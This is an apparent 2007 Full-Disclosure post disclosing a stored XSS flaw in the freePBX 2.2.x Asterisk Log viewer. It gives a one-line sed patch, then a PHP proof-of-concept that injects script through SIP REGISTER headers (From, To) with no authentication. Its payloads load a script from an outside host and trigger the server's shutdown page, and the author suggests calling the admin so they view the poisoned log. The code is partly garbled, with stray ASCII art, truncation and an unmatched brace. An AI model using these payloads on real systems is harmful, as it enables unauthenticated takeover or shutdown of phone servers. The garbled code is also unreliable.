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[Full-disclosure] XSS in freePBX 2.2.x portal's Asterisk Log tool


      \  |      |   |           |                   |  _)
     |\/ |  _ \ __| __ \  |   | |\ \  /  _` | __ \  __| | __ \   _` |
     |   |  __/ |   | | | |   | | `  <  (   | |   | |   | |   | (   |
    _|  _|\___|\__|_| |_|\__, |_| _/\_\\__,_|_|  _|\__|_|_|  _|\__,_|
    ___ \  ___|   /                     Methylxantina 256mg
       ) | __ \   _ \  __ `__ \   _` |  http://xenomuta.blogspot.com
      __/    ) | (   | |   |   | (   |  
    _____|____/ \___/ _|  _|  _|\__, |  freePBX 2.2.x full-log XSS PoC
|___/ by XenoMuta <xenomuta@xxxxxxxxxxxx>

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- =-=-=-=-=-=
SIP protocol's fields such as From, To, Call-ID, User-Agent (and many others) can carry html tags, wich are shown unfiltered by the Asterisk Log File tools located at http://<freepbx root>/admin/modules/logfiles/asterisk-full- log.php
resulting in malicios HMTL or Javascript code injection.

Server shutdown/restart, PBX control and Possible remote code execution through
amportal options. Just about anything you can code in Javascript.
* Note that the amportal's admin will only see the last 2000 lines of full log. for wich an attaker might call the admin asking for support at the time of exploitation. This doesn't require authentication or valid credentials >:)

* Do this on your own risk. Intended for research and educational purposes ONLY. * Neither the author or Methylxantine 256mg are accountable for your actions. * Running this will taint your log file. Make sure you clean it after a test.

Here is a way to fix the problem.

[root@asterisk1 ~]# cd /var/www/html/admin/modules/logfiles
[root@asterisk1 logfiles]# cat<<EOF|patch
*** asterisk-full-log.php       2007-04-18 12:51:10.000000000 -0400
--- asterisk-full-log.php.fixed 2007-04-18 12:51:18.000000000 -0400
*** 10,16 ****
! echo system ('tail --line=2000 /var/log/asterisk/full | sed -e "s/$/ <br>/"');

--- 10,16 ----
! echo system ('tail --line=2000 /var/log/asterisk/full | sed -e "s/</ \&lt;/;s/>/\&gt;/" | sed -e "s/$/<br>/"');


gr33tz to:
- God, for being so faithfull.
- Lili, por la paciencia nocturna y por tu amor
- the Asterisk team and the freePBX team, for such an EXCELENT product
- EMRA, por la fragancia
- Leo, te di Luz


print "\x1bc\n\x1b[1m\x1b[30m\x1b[47m";
print " \n"; print " \r"; print " \\ | | | | | _) \n"; print " \r"; print " |\\/ | _ \\ __| __ \\ | | |\\ \\ / _` | __ \\ __| | __ \\ _` |\n"; print " \r"; print " | | __/ | | | | | | | ` < ( | | | | | | | ( |\n"; print " \r"; print " _| _|\\___|\\__|_| |_|\\__, |_| _/\\_\\\\__,_|_| _|\\__| _|_| _|\\__,_|\n"; print " \r"; print " ____/ \n"; print " \r";
print "    ___ \\  ___|   /                     Methylxantina 256mg\n";
print " \r"; print " ) | __ \\ _ \\ __ `__ \\ _` | http:// xenomuta.blogspot.com\n"; print " \r";
print "      __/    ) | (   | |   |   | (   |       \n";
print " \r"; print " _____|____/ \\___/ _| _| _|\\__, | freePBX 2.2.x full- log XSS PoC\n"; print " \r"; print " |___/ by XenoMuta <xenomuta@xxxxxxxxxxxx>\n"; print " \n\x1b[0m";

//die("\x1b[31mWe urge you to read the code first. Comment this line to proceed.\n\x1b[0m");

if($argc<2) die("\nUsage: $argv[0] <sip proxy> [custom payload]\n\n");


//Execute external Payload (this one only possible with Call-id payload)
$payload="<script>var body=document.getElementsByTagName('body');var fly= new Image(), ofly=new Image(), ifly=new Image();ifly.src='http:// xenmut.100webspace.net/fly2.png';ofly.src='http://xenmut. 100webspace.net/fly1.png';ofly.onload=eval('var mv=setInterval(\'move ()\',10);');fly.setAttribute ('id','fly');fly.style.position='absolute;';fly.style.left='300';fly.sty le.top='100';body[0].appendChild(fly);var ang,s=2,xx,yy,cal,pi=3.1415926535,ala=true;function calma() {s=2;clearInterval(cal);}function move() {var x,y;x=(s*(Math.sin (ang)));y=(s*(Math.cos(ang)));ala=!ala;if(ala) fly.src=ifly.src;else fly.src=ofly.src;if(Math.round(100*Math.random())>96)ang+=ala?5:-5;if ((xx+x>1024)||(xx+x<0)||(yy+y>800)||(yy+y<0)){ang=Math.round (360*Math.random());}else{xx+=x;yy+=y;}fly.style.left=xx +'px';fly.style.top=yy+'px';}function main(){ang=Math.round (360*Math.random());xx=620;yy=400;fly.onmouseover=function() {s=10;ang=Math.round(360*Math.random());clearInterval (cal);cal=setInterval('calma()',500);}}main();</script>";

//Space Invader (this one only possible with Call-id payload)
//$payload="<img width=900 src=http://www.i-marco.nl/weblog/images/ SpaceInvader.jpg>";

// Server shutdown Payload
.oOOOo.     Oo    O       o oOoOOoOOo ooOoOOo  .oOOOo.  o.     O
.O     o    o  O   o       O     o        O    .O     o. Oo     o
o          O    o  O       o     o        o    O       o O O    O
o         oOooOoOo o       o     O        O    o       O O  o   o
o         o      O o       O     o        o    O       o O   o  O
O         O      o O       O     O        O    o       O o    O O
`o     .o o      O `o     Oo     O        O    `o     O' o     Oo
`OoooO'  O.     O  `OoooO'O     o'    ooOOoOo  `OoooO'  O     `o
//$payload='<img src="../sysstatus/shutdown.php">';
} else {

$agent="SJphone v1.0";
$packet = "REGISTER sip:$sipp SIP/2.0\n".
"Via: SIP/2.0/UDP $sipp:5060;rport;branch=z9hG4bK12345\n".
"From: $payload\n".
"To: $payload\n".
"Contact: \"$ext\" <sip:$ext@$sipp:5060>\n".
"Call-ID: 12345@$sipp\n".
"CSeq: 12345 REGISTER\n".
"Expires: 1800\n".
"Max-Forwards: 70\n".
"User-Agent: $agent\n".
"Content-Length: 0\n\n";
die("\nPAYLOAD SENT:\n$payload\n");


Attachment: smime.p7s
Description: S/MIME cryptographic signature

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